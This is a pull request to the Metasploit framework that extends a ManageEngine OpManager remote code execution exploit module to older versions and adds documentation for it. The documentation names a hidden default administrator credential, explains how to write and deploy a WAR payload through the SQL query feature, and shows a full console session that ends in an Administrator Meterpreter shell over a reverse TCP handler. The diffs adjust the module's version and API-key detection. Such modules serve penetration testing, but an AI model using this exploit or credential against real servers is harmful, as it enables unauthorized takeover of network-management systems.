### PR TITLE
OpManager Version Check

### DIFF
--- a/documentation/modules/exploit/windows/http/manage_engine_opmanager_rce.md
+++ b/documentation/modules/exploit/windows/http/manage_engine_opmanager_rce.md
@@ -1,0 +1,63 @@
+## Description
+
+This module exploits a default credential vulnerability in ManageEngine OpManager, where a
+default hidden account "IntegrationUser" with administrator privileges exists. The account
+has a default password of "plugin" which can not be reset through the user interface. By
+log-in and abusing the default administrator's SQL query functionality, it's possible to
+write a WAR payload to disk and trigger an automatic deployment of this payload.
+
+## Vulnerable Application
+
+[OpManager](https://www.manageengine.com/network-monitoring/) is an application designed
+around "integrated network management".
+
+This module has been verified against the following OpManager versions:
+
+* v11.0
+* v11.4
+* v11.5
+* v11.6
+
+Installers:
+
+* [OpManager Installers](http://archives.manageengine.com/opmanager/)
+
+## Verification Steps
+
+1. Start msfconsole
+1. `use exploit/windows/http/manage_engine_opmanager_rce`
+1. `set RHOST <IP addr of target system running OpManager>`
+1. `exploit`
+1. You should get a working Meterpreter session
+
+## Scenarios
+
+### Targeting Windows Server 2012 running OpManager v11.5
+
+```
+msf > use exploit/windows/http/manage_engine_opmanager_rce 
+msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12
+RHOST => 10.0.2.12
+msf exploit(manage_engine_opmanager_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.2.4:4444 
+[*] Access login page
+[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]
+[*] Following redirection
+[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]
+[*] Executing SQL queries
+[*] Attempting to launch payload in deployed WAR...
+[*] Attempting to launch payload in deployed WAR...
+[*] Attempting to launch payload in deployed WAR...
+[*] Sending stage (49667 bytes) to 10.0.2.12
+[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500
+[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war
+[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target
+
+meterpreter > getuid
+Server username: Administrator
+meterpreter > sysinfo
+Computer    : WIN-SI597APFOFH
+OS          : Windows Server 2008 6.2 (amd64)
+Meterpreter : java/windows
+```

--- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
+++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   # It removes large object in database, shoudn't be a problem, but just in case....
   Rank = ManualRanking

--- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
+++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
@@ -121,8 +121,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => redirect,
       'method' => 'GET'
     })
+    if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
+      version = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Could not gather the version in use")
+    end
 
-    if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
+    if res && res.code == 200 && ((version == 11.6 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/) || (version == 11.0 && res.body =~ /window.apiKey = "([a-z0-9]+)"/))
+      # the line above checks for the version, as for version 11.0 the call for the api key value is different but the rest of the exploit works the same.
       api_key = $1
       print_status("Retrieved API key [ #{api_key} ]")
     else

--- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
+++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_JAVA,
       'Targets'        =>
         [
-          ['ManageEngine OpManager v11.6', {}]
+          ['ManageEngine OpManager <= v11.6', {}]
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Sep 14 2015',
@@ -121,14 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => redirect,
       'method' => 'GET'
     })
-    if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
-      version = $1
-    else
-      fail_with(Failure::Unknown, "#{peer} - Could not gather the version in use")
-    end
 
-    if res && res.code == 200 && ((version == 11.6 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/) || (version == 11.0 && res.body =~ /window.apiKey = "([a-z0-9]+)"/))
-      # the line above checks for the version, as for version 11.0 the call for the api key value is different but the rest of the exploit works the same.
+    if res && res.code == 200 && res.body =~ /window.(?:OPM.)?apiKey = "([a-z0-9])"/
       api_key = $1
       print_status("Retrieved API key [ #{api_key} ]")
     else

--- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
+++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         has a default password of "plugin" which can not be reset through the user interface. By
         log-in and abusing the default administrator's SQL query functionality, it's possible to
         write a WAR payload to disk and trigger an automatic deployment of this payload. This
-        module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
+        module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
+++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET'
     })
 
-    if res && res.code == 200 && res.body =~ /window.(?:OPM.)?apiKey = "([a-z0-9])"/
+    if res && res.code == 200 && res.body =~ /window.(?:OPM.)?apiKey = "([a-z0-9]+)"/
       api_key = $1
       print_status("Retrieved API key [ #{api_key} ]")
     else


### PR DESCRIPTION
Checks for the version of the OpManager. For version 11.6 the call for the api key value is different from the one in version 11.0, which stops the current exploit from working on older versions. The rest of the exploit works the same.

For versions 11.5 and up /window.OPM.apiKey 
For version 11.0 /window.apiKey 

Tested on version 11.0

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/http/manage_engine_opmanager_rce`
- [x] `set RHOST <IP addr of target system running OpManager>`
- [x] `exploit`
- [x] **Verify** you get a working Meterpreter session